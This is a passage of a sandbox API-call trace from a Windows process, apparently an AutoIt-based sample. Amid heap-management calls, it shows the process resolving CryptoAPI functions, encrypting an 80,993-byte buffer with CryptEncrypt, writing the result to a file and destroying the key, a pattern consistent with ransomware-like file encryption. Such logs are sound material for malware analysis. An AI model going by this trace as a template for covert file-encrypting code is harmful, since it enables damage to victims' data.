dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0132.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.429] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0132.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0132.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0132.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0132.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0132.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0132.430] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0132.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0132.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0132.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.432] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0132.432] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0132.432] CryptGetKeyParam (in: hKey=0x41ac200, dwParam=0x7, pbData=0x43e2ac0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2ac0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0132.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0132.434] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0132.435] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0132.435] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0132.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0132.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0132.436] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0132.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.436] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0132.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb210, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0132.438] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x13c5b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x13c60) returned 1 [0132.438] CharLowerBuffW (in: lpsz="byte[80993]", cchLength=0xb | out: lpsz="byte[80993]") returned 0xb [0132.440] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb3a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0132.440] CryptEncrypt (in: hKey=0x41ac200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f0048*, pdwDataLen=0x144e538*=0x13c5b, dwBufLen=0x13c60 | out: pbData=0x48f0048*, pdwDataLen=0x144e538*=0x13c60) returned 1 [0132.440] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0132.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0132.441] WriteFile (in: hFile=0x2a0, lpBuffer=0x49aa010*, nNumberOfBytesToWrite=0x13c60, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49aa010*, lpNumberOfBytesWritten=0x144ef3c*=0x13c60, lpOverlapped=0x0) returned 1 [0132.443] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0132.443] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0132.444] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0132.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0132.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb018, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0132.444] CryptDestroyKey (hKey=0x41ac200) returned 1 [0132.444] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0132.444] CharUpperBuffW (in: 